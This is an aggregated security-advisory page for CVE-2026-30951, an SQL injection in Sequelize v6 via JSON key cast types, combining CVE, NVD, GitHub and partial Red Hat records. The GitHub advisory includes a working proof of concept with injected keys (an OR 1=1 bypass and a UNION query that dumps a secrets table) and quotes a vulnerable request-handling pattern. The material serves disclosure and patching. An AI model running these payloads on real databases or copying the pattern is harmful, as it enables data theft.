CVE-2026-30951 (GCVE-0-2026-30951)
Vulnerability from cvelistv5 – Published: 2026-03-10 20:22 – Updated: 2026-03-11 14:40 – CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
| URL | Tags |
|---|---|
| https://github.com/sequelize/sequelize/security/a… | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-30951",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-11T14:40:09.586637Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-11T14:40:34.034Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "sequelize",
"vendor": "sequelize",
"versions": [
{
"status": "affected",
"version": "\u003e= 6.0.0-beta.1, \u003c 6.37.8"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS \u003ctype\u003e) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table. This vulnerability is fixed in 6.37.8."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-11T00:19:12.793Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr"
}
],
"source": {
"advisory": "GHSA-6457-6jrx-69cr",
"discovery": "UNKNOWN"
},
"title": "Sequelize v6 Vulnerable to SQL Injection via JSON Column Cast Type"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-30951",
"datePublished": "2026-03-10T20:22:46.150Z",
"dateReserved": "2026-03-07T17:34:39.980Z",
"dateUpdated": "2026-03-11T14:40:34.034Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-30951",
"date": "2026-05-25",
"epss": "0.0002",
"percentile": "0.05891"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-30951\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-10T21:16:48.030\",\"lastModified\":\"2026-03-18T19:16:04.997\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS \u003ctype\u003e) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table. This vulnerability is fixed in 6.37.8.\"},{\"lang\":\"es\",\"value\":\"Sequelize es una herramienta ORM para Node.js. Antes de la 6.37.8, existe una inyecci\u00f3n SQL mediante un tipo de conversi\u00f3n (cast) sin escapar en el procesamiento de cl\u00e1usulas WHERE de JSON/JSONB. La funci\u00f3n _traverseJSON() divide las claves de ruta JSON en :: para extraer un tipo de conversi\u00f3n (cast), el cual se interpola directamente en el SQL CAST(... AS ). Un atacante que controla las claves de objetos JSON puede inyectar SQL arbitrario y exfiltrar datos de cualquier tabla. 
Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 6.37.8.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sequelizejs:sequelize:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"6.37.8\",\"matchCriteriaId\":\"AD0E1D98-A552-4E72-B530-62CC7B1B21B8\"}]}]}],\"references\":[{\"url\":\"https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"cna\": {\"title\": \"SQL Injection via JSON Column Cast Type in Sequelize v6\", \"source\": {\"advisory\": \"GHSA-6457-6jrx-69cr\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"sequelize\", \"product\": \"sequelize\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 6.37.8\"}]}], \"references\": [{\"url\": \"https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr\", \"name\": \"https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS \u003ctype\u003e) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table. 
This vulnerability is fixed in 6.37.8.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-10T20:22:46.150Z\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-30951\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-11T14:40:09.586637Z\"}}}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2026-03-11T14:40:29.642Z\"}}]}",
"cveMetadata": "{\"cveId\": \"CVE-2026-30951\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-10T20:22:46.150Z\", \"dateReserved\": \"2026-03-07T17:34:39.980Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-10T20:22:46.150Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-30951
Vulnerability from fkie_nvd - Published: 2026-03-10 21:16 - Updated: 2026-03-18 19:16 - 7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
| Source | URL | Tags |
|---|---|---|
| security-advisories@github.com | https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr | Exploit, Mitigation, Vendor Advisory |
| Vendor | Product | Version |
|---|---|---|
| sequelizejs | sequelize | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sequelizejs:sequelize:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "AD0E1D98-A552-4E72-B530-62CC7B1B21B8",
"versionEndExcluding": "6.37.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS \u003ctype\u003e) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table. This vulnerability is fixed in 6.37.8."
},
{
"lang": "es",
"value": "Sequelize es una herramienta ORM para Node.js. Antes de la 6.37.8, existe una inyecci\u00f3n SQL mediante un tipo de conversi\u00f3n (cast) sin escapar en el procesamiento de cl\u00e1usulas WHERE de JSON/JSONB. La funci\u00f3n _traverseJSON() divide las claves de ruta JSON en :: para extraer un tipo de conversi\u00f3n (cast), el cual se interpola directamente en el SQL CAST(... AS ). Un atacante que controla las claves de objetos JSON puede inyectar SQL arbitrario y exfiltrar datos de cualquier tabla. Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 6.37.8."
}
],
"id": "CVE-2026-30951",
"lastModified": "2026-03-18T19:16:04.997",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2026-03-10T21:16:48.030",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-6457-6JRX-69CR
Vulnerability from github – Published: 2026-03-11 00:18 – Updated: 2026-03-11 00:18
Summary
SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS <type>) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table.
Affected: v6.x through 6.37.7. v7 (@sequelize/core) is not affected.
Details
In src/dialects/abstract/query-generator.js, _traverseJSON() extracts a cast type from :: in JSON keys without validation:
// line 1892
// Excerpt of src/dialects/abstract/query-generator.js (sequelize v6 before 6.37.8) as quoted
// by the advisory; the statements between the cast extraction and the push are elided ("// ...").
// The last segment of a JSON where-clause key may carry a "::<type>" suffix; the text after
// "::" is taken verbatim as the SQL cast type, and only the part before it stays in the path.
_traverseJSON(items, baseKey, prop, item, path) {
  let cast;
  if (path[path.length - 1].includes("::")) {
    const tmp = path[path.length - 1].split("::");
    cast = tmp[1]; // attacker-controlled, no escaping
    path[path.length - 1] = tmp[0];
  }
  // ...
  // `cast` leaves this function unvalidated: per the advisory, _castKey() wraps it in
  // Utils.Cast and handleSequelizeMethod() interpolates it into `CAST(... AS ${type})`,
  // whereas the JSON path itself goes through this.escape() in jsonPathExtractionQuery().
  items.push(this.whereItemQuery(this._castKey(pathKey, item, cast), { [Op.eq]: item }));
}
_castKey() (line 1925) passes it to Utils.Cast, and handleSequelizeMethod() (line 1692) interpolates it directly:
return `CAST(${result} AS ${smth.type.toUpperCase()})`;
JSON path values are escaped via this.escape() in jsonPathExtractionQuery(), but the cast type is not.
Suggested fix — whitelist known SQL data types:
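// Suggested mitigation from the advisory text: a deny-by-default allowlist of SQL cast types.
// Membership is an exact (case-insensitive) match, so parameterized or punctuated forms such
// as "varchar(255)" are rejected instead of reaching CAST().
const ALLOWED_CAST_TYPES = new Set([
  'integer', 'text', 'real', 'numeric', 'boolean', 'date',
  'timestamp', 'timestamptz', 'json', 'jsonb', 'float',
  'double precision', 'bigint', 'smallint', 'varchar', 'char',
]);

// `cast` is the text after "::" extracted in _traverseJSON(); it is undefined when the key
// carries no suffix. The value is lower-cased for the lookup because the consumer upper-cases
// it before interpolation (handleSequelizeMethod(), quoted above).
// Guarding on `!== undefined` rather than truthiness means an empty suffix ("key::", which
// yields cast === "") is rejected as well, instead of skipping the check and reaching
// CAST() as an empty type.
if (cast !== undefined && !ALLOWED_CAST_TYPES.has(cast.toLowerCase())) {
  throw new Error(`Invalid cast type: ${cast}`);
}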
PoC
npm install sequelize@6.37.7 sqlite3
const { Sequelize, DataTypes } = require('sequelize');
// Advisory reproduction against sequelize@6.37.7 (installed by the command quoted above) on an
// in-memory SQLite database. Both queries show that the text after "::" in a JSON where-clause
// KEY is placed into the generated CAST(... AS ...) unescaped; the logged SQL makes the
// boundary visible. Fixed in 6.37.8.
async function main() {
  const sequelize = new Sequelize('sqlite::memory:', { logging: false });

  // Model whose JSON column is queried through the vulnerable path.
  const User = sequelize.define('User', {
    username: DataTypes.STRING,
    metadata: DataTypes.JSON,
  });

  // Unrelated table; it only exists to show that the query can read rows from another table.
  const Secret = sequelize.define('Secret', {
    key: DataTypes.STRING,
    value: DataTypes.STRING,
  });

  await sequelize.sync({ force: true });

  await User.bulkCreate([
    { username: 'alice', metadata: { role: 'admin', level: 10 } },
    { username: 'bob', metadata: { role: 'user', level: 5 } },
    { username: 'charlie', metadata: { role: 'user', level: 1 } },
  ]);

  await Secret.bulkCreate([
    { key: 'api_key', value: 'sk-secret-12345' },
    { key: 'db_password', value: 'super_secret_password' },
  ]);

  // TEST 1: WHERE clause bypass
  // The object key (not the value 'anything') is the injection point: "role" selects the JSON
  // path and everything after "::" lands in the SQL verbatim, so the filter no longer constrains
  // the result set.
  const r1 = await User.findAll({
    where: { metadata: { 'role::text) or 1=1--': 'anything' } },
    logging: (sql) => console.log('SQL:', sql),
  });
  console.log('OR 1=1:', r1.map(u => u.username));
  // Returns ALL rows: ['alice', 'bob', 'charlie']

  // TEST 2: UNION-based cross-table exfiltration
  // raw: true returns plain row objects, so the Secret columns come back under User's column
  // positions (username/metadata), which is why they are printed as `${username}=${metadata}`.
  const r2 = await User.findAll({
    where: {
      metadata: {
        'role::text) and 0 union select id,key,value,null,null from Secrets--': 'x'
      }
    },
    raw: true,
    logging: (sql) => console.log('SQL:', sql),
  });
  console.log('UNION:', r2.map(r => `${r.username}=${r.metadata}`));
  // Returns: api_key=sk-secret-12345, db_password=super_secret_password
}
// Run the reproduction; a rejected promise is written to stderr instead of being left unhandled.
main().catch(console.error);
Output:
SQL: SELECT `id`, `username`, `metadata`, `createdAt`, `updatedAt`
FROM `Users` AS `User`
WHERE CAST(json_extract(`User`.`metadata`,'$.role') AS TEXT) OR 1=1--) = 'anything';
OR 1=1: [ 'alice', 'bob', 'charlie' ]
SQL: SELECT `id`, `username`, `metadata`, `createdAt`, `updatedAt`
FROM `Users` AS `User`
WHERE CAST(json_extract(`User`.`metadata`,'$.role') AS TEXT) AND 0
UNION SELECT ID,KEY,VALUE,NULL,NULL FROM SECRETS--) = 'x';
UNION: [ 'api_key=sk-secret-12345', 'db_password=super_secret_password' ]
Impact
SQL Injection (CWE-89) — Any application that passes user-controlled objects as where clause values for JSON/JSONB columns is vulnerable. An attacker can exfiltrate data from any table in the database via UNION-based or boolean-blind injection. All dialects with JSON support are affected (SQLite, PostgreSQL, MySQL, MariaDB).
A common vulnerable pattern:
// Vulnerable pattern quoted by the advisory: the client-supplied object is forwarded as the
// where clause unchanged, so the client controls the JSON object KEYS — the "::" suffix
// handling in _traverseJSON() is reached with untrusted input on sequelize v6 < 6.37.8.
// Mitigation: upgrade to 6.37.8 and, independently of the ORM fix, build the where clause from
// an allowlist of expected field names rather than passing req.body.filter through.
app.post('/api/users/search', async (req, res) => {
  const users = await User.findAll({
    where: { metadata: req.body.filter } // user controls JSON object keys
  });
  res.json(users);
});
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.37.7"
},
"package": {
"ecosystem": "npm",
"name": "sequelize"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0-beta.1"
},
{
"fixed": "6.37.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30951"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-11T00:18:48Z",
"nvd_published_at": "2026-03-10T21:16:48Z",
"severity": "HIGH"
},
"details": "### Summary\n\nSQL injection via unescaped cast type in JSON/JSONB `where` clause processing. The `_traverseJSON()` function splits JSON path keys on `::` to extract a cast type, which is interpolated raw into `CAST(... AS \u003ctype\u003e)` SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table.\n\nAffected: v6.x through 6.37.7. v7 (`@sequelize/core`) is not affected.\n\n### Details\n\nIn `src/dialects/abstract/query-generator.js`, `_traverseJSON()` extracts a cast type from `::` in JSON keys without validation:\n\n```javascript\n// line 1892\n_traverseJSON(items, baseKey, prop, item, path) {\n let cast;\n if (path[path.length - 1].includes(\"::\")) {\n const tmp = path[path.length - 1].split(\"::\");\n cast = tmp[1]; // attacker-controlled, no escaping\n path[path.length - 1] = tmp[0];\n }\n // ...\n items.push(this.whereItemQuery(this._castKey(pathKey, item, cast), { [Op.eq]: item }));\n}\n```\n\n`_castKey()` (line 1925) passes it to `Utils.Cast`, and `handleSequelizeMethod()` (line 1692) interpolates it directly:\n\n```javascript\nreturn `CAST(${result} AS ${smth.type.toUpperCase()})`;\n```\n\nJSON path **values** are escaped via `this.escape()` in `jsonPathExtractionQuery()`, but the cast **type** is not.\n\n**Suggested fix** \u2014 whitelist known SQL data types:\n\n```javascript\nconst ALLOWED_CAST_TYPES = new Set([\n \u0027integer\u0027, \u0027text\u0027, \u0027real\u0027, \u0027numeric\u0027, \u0027boolean\u0027, \u0027date\u0027,\n \u0027timestamp\u0027, \u0027timestamptz\u0027, \u0027json\u0027, \u0027jsonb\u0027, \u0027float\u0027,\n \u0027double precision\u0027, \u0027bigint\u0027, \u0027smallint\u0027, \u0027varchar\u0027, \u0027char\u0027,\n]);\n\nif (cast \u0026\u0026 !ALLOWED_CAST_TYPES.has(cast.toLowerCase())) {\n throw new Error(`Invalid cast type: ${cast}`);\n}\n```\n\n### PoC\n\n`npm install sequelize@6.37.7 sqlite3`\n\n```javascript\nconst { Sequelize, DataTypes } = 
require(\u0027sequelize\u0027);\n\nasync function main() {\n const sequelize = new Sequelize(\u0027sqlite::memory:\u0027, { logging: false });\n\n const User = sequelize.define(\u0027User\u0027, {\n username: DataTypes.STRING,\n metadata: DataTypes.JSON,\n });\n\n const Secret = sequelize.define(\u0027Secret\u0027, {\n key: DataTypes.STRING,\n value: DataTypes.STRING,\n });\n\n await sequelize.sync({ force: true });\n\n await User.bulkCreate([\n { username: \u0027alice\u0027, metadata: { role: \u0027admin\u0027, level: 10 } },\n { username: \u0027bob\u0027, metadata: { role: \u0027user\u0027, level: 5 } },\n { username: \u0027charlie\u0027, metadata: { role: \u0027user\u0027, level: 1 } },\n ]);\n\n await Secret.bulkCreate([\n { key: \u0027api_key\u0027, value: \u0027sk-secret-12345\u0027 },\n { key: \u0027db_password\u0027, value: \u0027super_secret_password\u0027 },\n ]);\n\n // TEST 1: WHERE clause bypass\n const r1 = await User.findAll({\n where: { metadata: { \u0027role::text) or 1=1--\u0027: \u0027anything\u0027 } },\n logging: (sql) =\u003e console.log(\u0027SQL:\u0027, sql),\n });\n console.log(\u0027OR 1=1:\u0027, r1.map(u =\u003e u.username));\n // Returns ALL rows: [\u0027alice\u0027, \u0027bob\u0027, \u0027charlie\u0027]\n\n // TEST 2: UNION-based cross-table exfiltration\n const r2 = await User.findAll({\n where: {\n metadata: {\n \u0027role::text) and 0 union select id,key,value,null,null from Secrets--\u0027: \u0027x\u0027\n }\n },\n raw: true,\n logging: (sql) =\u003e console.log(\u0027SQL:\u0027, sql),\n });\n console.log(\u0027UNION:\u0027, r2.map(r =\u003e `${r.username}=${r.metadata}`));\n // Returns: api_key=sk-secret-12345, db_password=super_secret_password\n}\n\nmain().catch(console.error);\n```\n\n**Output:**\n\n```\nSQL: SELECT `id`, `username`, `metadata`, `createdAt`, `updatedAt`\n FROM `Users` AS `User`\n WHERE CAST(json_extract(`User`.`metadata`,\u0027$.role\u0027) AS TEXT) OR 1=1--) = \u0027anything\u0027;\nOR 1=1: [ \u0027alice\u0027, 
\u0027bob\u0027, \u0027charlie\u0027 ]\n\nSQL: SELECT `id`, `username`, `metadata`, `createdAt`, `updatedAt`\n FROM `Users` AS `User`\n WHERE CAST(json_extract(`User`.`metadata`,\u0027$.role\u0027) AS TEXT) AND 0\n UNION SELECT ID,KEY,VALUE,NULL,NULL FROM SECRETS--) = \u0027x\u0027;\nUNION: [ \u0027api_key=sk-secret-12345\u0027, \u0027db_password=super_secret_password\u0027 ]\n```\n\n### Impact\n\n**SQL Injection (CWE-89)** \u2014 Any application that passes user-controlled objects as `where` clause values for JSON/JSONB columns is vulnerable. An attacker can exfiltrate data from any table in the database via UNION-based or boolean-blind injection. All dialects with JSON support are affected (SQLite, PostgreSQL, MySQL, MariaDB).\n\nA common vulnerable pattern:\n\n```javascript\napp.post(\u0027/api/users/search\u0027, async (req, res) =\u003e {\n const users = await User.findAll({\n where: { metadata: req.body.filter } // user controls JSON object keys\n });\n res.json(users);\n});\n```",
"id": "GHSA-6457-6jrx-69cr",
"modified": "2026-03-11T00:18:48Z",
"published": "2026-03-11T00:18:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30951"
},
{
"type": "PACKAGE",
"url": "https://github.com/sequelize/sequelize"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Sequelize v6 Vulnerable to SQL Injection via JSON Column Cast Type"
}
RHSA-2026:8498
Vulnerability from csaf_redhat - Published: 2026-04-16 15:09 - Updated: 2026-05-22 08:51
A flaw was found in lodash. The fix for CVE-2021-23337 added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Sequelize, a Node.js Object-Relational Mapper (ORM) tool. A remote attacker can exploit a SQL injection vulnerability by manipulating JSON object keys during JSON/JSONB where clause processing. This allows for the injection of arbitrary SQL commands due to the improper handling of cast types. The primary consequence is the potential for unauthorized data exfiltration from any database table.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "A new satellite/iop-remediations-rhel9 container image is now generally available in the Red Hat container registry.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Lightspeed in Satellite analyzes system health and configuration by applying predefined rules to a small set of local data, such as installed packages, running services, and configuration settings. When you install Red Hat Lightspeed in Satellite locally, you can generate Red Hat Lightspeed recommendations without sending system data to Red Hat services. ",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:8498",
"url": "https://access.redhat.com/errata/RHSA-2026:8498"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_satellite/6.18/html/updating_red_hat_satellite/index",
"url": "https://access.redhat.com/documentation/en-us/red_hat_satellite/6.18/html/updating_red_hat_satellite/index"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-30951",
"url": "https://access.redhat.com/security/cve/CVE-2026-30951"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4800",
"url": "https://access.redhat.com/security/cve/CVE-2026-4800"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://catalog.redhat.com/software/containers/search",
"url": "https://catalog.redhat.com/software/containers/search"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_satellite/6.18/html/installing_satellite_server_in_a_connected_network_environment/performing-additional-configuration-on-server_satellite#installing-and-configuring-red-hat-lightspeed-in-satellite",
"url": "https://docs.redhat.com/en/documentation/red_hat_satellite/6.18/html/installing_satellite_server_in_a_connected_network_environment/performing-additional-configuration-on-server_satellite#installing-and-configuring-red-hat-lightspeed-in-satellite"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_satellite/6.18/html/installing_satellite_server_in_a_disconnected_network_environment/performing-additional-configuration#installing-and-configuring-red-hat-lightspeed-in-satellite",
"url": "https://docs.redhat.com/en/documentation/red_hat_satellite/6.18/html/installing_satellite_server_in_a_disconnected_network_environment/performing-additional-configuration#installing-and-configuring-red-hat-lightspeed-in-satellite"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8498.json"
}
],
"title": "Red Hat Security Advisory: General availability of the satellite/iop-remediations-rhel9 container image",
"tracking": {
"current_release_date": "2026-05-22T08:51:17+00:00",
"generator": {
"date": "2026-05-22T08:51:17+00:00",
"engine": {
